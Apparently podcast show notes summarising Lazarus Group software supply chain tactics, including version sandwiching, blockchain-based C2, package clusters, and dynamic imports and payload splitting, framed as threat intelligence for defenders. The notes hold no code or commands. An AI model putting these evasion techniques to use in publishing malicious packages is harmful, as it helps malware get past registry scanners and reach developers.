This week we talked about:
DPRK Lazarus Group trends in software supply chain malware: Three active techniques he's observing from North Korea's Lazarus Group. The first is “version sandwiching,” where threat actors publish benign versions of a package before and after a malicious one, then pin their delivery mechanism to the malicious version so scanners checking the latest release see nothing wrong. The second is their continued reuse of Aptos, Tron, and Binance BSC blockchain addresses as mutable C2 infrastructure, which allows defenders to tie disparate campaigns to the same threat actor. The third is human-readable campaign name strings embedded in payloads, functioning like UTM tags and likely reflecting internal tracking within Lazarus subgroups.
General supply chain threat landscape: Cross-ecosystem attacks, once limited to nation-state actors, are now being executed by low-sophistication crews using vibe coding tools to quickly port payloads across npm, PyPI, and other registries simultaneously. Package clusters, where only one or two packages in a published group carry the actual payload, have become standard operating procedure across threat actors of all levels. Dynamic imports and payload splitting are also on the rise, bypassing package managers and firewalls by pulling dependencies from URLs at runtime or distributing payload components across multiple files.
Episode Resources
